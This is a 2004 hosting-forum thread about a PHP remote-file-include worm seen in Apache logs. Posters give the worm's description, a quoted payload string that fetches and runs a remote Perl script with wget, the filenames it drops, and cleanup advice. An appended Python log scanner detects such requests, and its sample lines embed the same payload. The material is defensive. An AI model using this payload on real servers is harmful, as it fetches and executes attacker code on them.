The Community Forums


Worm? http://www.visualcoders.net/spy.gif?

Discussion in 'General Discussion' started by yuga, Dec 27, 2004.

  1. yuga

    yuga Active Member

    Joined:
    Jan 8, 2004
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    1
    One of my domains is getting this in the Apache logs: p=http://www.visualcoders.net/spy.gif?

    I heard it is a worm or something but could not find any reference in Google. Can anybody help me? My server is running RHES 3.0, Cpanel/WHM and PHP was already upgraded to v 4.3.10.
     
  2. mike_r

    mike_r Well-Known Member

    Joined:
    Nov 26, 2002
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    6
    "The following exploit/worm (PhpInclude.Worm) attacks any CGI it can find using Google and Yahoo and tries to cause them to include an arbitrary PHP file that is then executed becoming the sibling of the worm."

    $lista1 = 'http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl php.txt';
    # Other filenames included with this and other variants :
    # adfkgnnodfijg
    # bot
    # bot.txt
    # bot.txt.1
    # dry.scp
    # ssh.a
    # terrorbot.txt
    # terrorbot.txt.1
    # terrorworm.txt
    # terrorworm.txt.1
    # unbot.txt
    # unbot.txt.1
    # unbot.txt.2
    # unbot.txt.3
    # unworm.txt
    # unworm.txt.1
    # unworm.txt.2
    # unworm.txt.3
    # worm1.txt
    # worm.txt
    # worm.txt.1

    So beware of those files.
     
  3. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Check your /tmp | /var/tmp | /usr/local/apache/proxy for the above-mentioned worm files...

    Can also do a find or locate for them in case they got put elsewhere on the filesystem.

    Also check your running processes for perl processes.
     
  4. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    This technique can also be seen when a user has an unpatched phpBB forum; ensure your forums have been updated.
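
The log pattern discussed in this thread, as an added detection example (not part of the thread and not any poster's code): it flags access-log requests where a query parameter's value is itself a remote URL, or carries shell commands like the quoted `cmd=` string. The sample log lines, client IPs, the `/index.php` path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache common/combined log entry; .+? tolerates raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# A parameter whose value is itself a URL, like p=http://.../spy.gif? in the thread.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell commands at the start of a value or after a separator, like the quoted cmd= string.
SHELL_RE = re.compile(r'(?:^|[;|&]\s*)(?:cd|wget|curl|perl)\s', re.IGNORECASE)


def suspicious_params(log_line):
    """Return [(param, reason), ...] for one access-log line, [] if nothing matches."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            findings.append((name, "remote-url"))
        elif SHELL_RE.search(value):
            findings.append((name, "shell-command"))
    return findings


def scan(lines):
    """Return [(client_ip, findings), ...] for every line with at least one finding."""
    hits = []
    for line in lines:
        found = suspicious_params(line)
        if found:
            hits.append((line.split(" ", 1)[0], found))
    return hits


# Constructed sample lines (documentation IPs, hypothetical /index.php); only the
# p= value and the cmd= string are taken from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2004:10:01:02 +0000] "GET /index.php?p=about HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Dec/2004:10:03:17 +0000] "GET /index.php?p=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.server.tld/spybot.txt;%20perl%20php.txt HTTP/1.0" 200 812',
    '192.0.2.45 - - [27/Dec/2004:10:04:40 +0000] "GET /index.php?p=http%3A%2F%2Fwww.visualcoders.net%2Fspy.gif%3F HTTP/1.0" 200 812',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, found)
```

Treat hits as leads to review: a legitimate redirect or return-URL parameter also matches the `remote-url` rule, so check which script received the request and whether it includes files by parameter.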
     